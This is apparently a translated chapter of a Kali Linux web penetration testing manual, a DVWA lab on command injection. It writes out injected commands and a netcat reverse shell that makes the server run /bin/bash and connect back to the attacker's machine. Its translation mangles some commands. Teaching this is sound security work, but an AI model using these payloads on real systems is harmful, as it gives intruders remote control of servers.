The mine casting team

Member Information:

Thr0cyte, Gr33k, Hua Hua, MrTools, R1ght0us, 7089bAt

The part marked in red is today’s update.

6.0, introduced

6.1. Find vulnerabilities in file inclusion

6.2 File Inclusion and file upload

6.3. Verify SQL injection manually

6.4. SQL injection based on errors

6.5. Identify and exploit the SQL blind injection vulnerability

Use SQLMap to find and use SQL injection

6.7. Use XML external entity injection

6.8. Detect and exploit command injection vulnerabilities


6.8. Detect and exploit command injection vulnerabilities

We’ve seen before how to use PHP’s system() function to execute operating system commands on the server. Sometimes, developers use directives like these or others with the same functionality to perform certain tasks. Ultimately, they use unvalidated user input as arguments to command execution, thus creating a command injection vulnerability.

In this section, we will exploit the command injection vulnerability to extract important information from the server.

 

We practice

Log in to DVWA and enter the Command Execution page

1. We’ll see a free-form Ping table. Let me try ping 192.168.56.10(this is our Kali Linux IP):

This output looks like it was taken directly from the output of the ping command. This indicates that the server is using operating system commands to ping, so operating system commands may be injected.

2. Let’s try injecting a very simple command. Submit the following code,

192.168.56.10; Uname – a:

We can see the output of the uname command after the ping output. We have a command injection vulnerability here.

3. If the IP address is removed, only the IP address is displayed. Uname – a? The results are shown below:

4. Now we’ll get a reverse shell on the server. First, we have to make sure we have what we need on the server. Submit; The ls/bin/nc *. It should return a list of files with the full path:

We have more than one version of NetCat, which is the tool we use to generate connections. The OpenBSD version of NetCat does not support command execution on the connection, so we will use traditional.

5. The next step is to listen for connections in Kali Linux. Open the terminal and run the following command:

nc -lp 1691 -v

6. Then we submit the following content in the browser:

; Nc. Traditional -e/bin/bash 192.168.56.10 1691&

7. We will see how to listen on the Kali terminal to receive connections. Here, we can execute commands on the server, as shown below:

Our terminals react to the connection. Now we can issue non-interactive commands and examine their output.

 

 

The principle of analyzing

As with SQLi and other examples, the command injection vulnerability is due to poor input validation mechanisms and the use of user-supplied data to form strings that might be used as operating system commands. If we look at the source code of the page we just attacked (each DVWA page has a button in the lower right corner), it looks like this:

We can see that it appends user input directly to the ping command. All we do is add a semicolon, which the system shell interprets as a command separator, and next to the semicolon is the command we want to execute.

After successful command execution, the next step is to verify that the server has NetCat, a tool that can establish network connections and, in some versions, execute commands when a new connection is established.

We saw that the server’s system had two different versions of NetCat, and we chose the one that suited the features of our version.

We then set up the attack system to listen for connections on TCP port 1691 (possibly any other AVAILABLE TCP port), and then instruct the server to connect to our machine through that port and execute /bin/bash(system shell) when the connection is established. Anything we send over this connection will be received as input by the shell in the server. Using & at the end of the command is to execute it in the background, preventing execution of the PHP script from stopping while it waits for a response from the command.

——————————————————————–

More exciting content, pay attention to the dark soul studio

Kali Linux Web Penetration Test Manual (2nd edition)- 6.7 – Leveraging XML external entity injection

Kali Linux Web Penetration Test Manual (2nd edition) – 6.6 – Use SQLMap to find and leverage SQL injection

Daily Planet 20190106- New CTF tutorial coming online soon

Daily Planet 20190109– Resource directory available on Github, visit

Knowledge planet joins the secret circle of mystic spiritsSmall program